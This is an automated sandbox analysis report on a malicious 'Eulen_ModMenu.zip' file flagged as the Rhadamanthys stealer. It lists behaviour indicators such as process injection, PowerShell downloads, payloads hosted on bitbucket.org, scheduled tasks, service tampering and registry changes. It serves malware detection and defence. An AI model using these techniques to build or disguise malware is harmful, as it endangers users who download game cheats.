Analysis Overview
SHA256
7fd200c3ecea601de41a954b010d215a160436a28d0fb1dfb954dee0d0eb963f
Threat Level: Known bad
The file Eulen_ModMenu.zip was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Stops running service(s)
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Unsigned PE
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Kills process with taskkill
Suspicious use of UnmapMainImage
Delays execution with timeout.exe
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 15:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
273s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3504 created 2724 | N/A | C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b1.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b2.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b2.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4500 set thread context of 3452 | N/A | C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b2.exe | C:\Windows\system32\dialer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={8B7A11B3-DFB2-4302-BB6C-2DF5F3E835FF}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716909730" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 15:22:07 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\30befe0e-8ea2-4e21 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000629138d712b1da0194586be112b1da0194586be112b1da010abf09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58cc7a2000353865663164653536643264636136326134333063346262363833333232653039383235643232613964393361343238326332316537636139383037656564630000b20009000400efbebc58cc7abc58cc7a2e00000000000000000000000000000000000000000000000000a2244700350038006500660031006400650035003600640032006400630061003600320061003400330030006300340062006200360038003300330032003200650030003900380032003500640032003200610039006400390033006100340032003800320063003200310065003700630061003900380030003700650065006400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef5ba4b31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35386566316465353664326463613632613433306334626236383333323265303938323564323261396439336134323832633231653763613938303765656463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f626a6979756965000000000000000096f7560095bce14897a93e3da1d528bc185f531c3a0def119519f20c5df75bb096f7560095bce14897a93e3da1d528bc185f531c3a0def119519f20c5df75bb0d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0034003100320034003900300030003500350031002d0034003000360038003400370036003000360037002d0033003400390031003200310032003500330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f3ccc8c000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a337333d-6dda-4912 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003c60e9d612b1da013c60e9d612b1da013c60e9d612b1da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58cc7a2000373939386434623438653766636533376565333664363862663062346438646631363831643562616361393530633662663138313865633633393037646463360000b20009000400efbebc58cc7abc58cc7a2e00000000000000000000000000000000000000000000000000c4975b00370039003900380064003400620034003800650037006600630065003300370065006500330036006400360038006200660030006200340064003800640066003100360038003100640035006200610063006100390035003000630036006200660031003800310038006500630036003300390030003700640064006300360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef5ba4b31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37393938643462343865376663653337656533366436386266306234643864663136383164356261636139353063366266313831386563363339303764646336000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f626a6979756965000000000000000096f7560095bce14897a93e3da1d528bcff5e531c3a0def119519f20c5df75bb096f7560095bce14897a93e3da1d528bcff5e531c3a0def119519f20c5df75bb0d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0034003100320034003900300030003500350031002d0034003000360038003400370036003000360037002d0033003400390031003200310032003500330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f3ccc8c000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6f46c3e3-6e97-4c9d = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e8b0e8db-6770-41ff | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\30befe0e-8ea2-4e21 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6f46c3e3-6e97-4c9d = 651701d712b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6f46c3e3-6e97-4c9d = "\\\\?\\Volume{8CCC3C3F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58ef1de56d2dca62a430c4bb683322e09825d22a9d93a4282c21e7ca9807eedc" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0211edf0-be10-43df = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13a82c23-3b63-4f9a = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0211edf0-be10-43df = "\\\\?\\Volume{8CCC3C3F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ed11556e0761b6e0764bdb39a077fcd9fbaaa63ca46e07b80b5f5faa4d595c4" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a337333d-6dda-4912 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
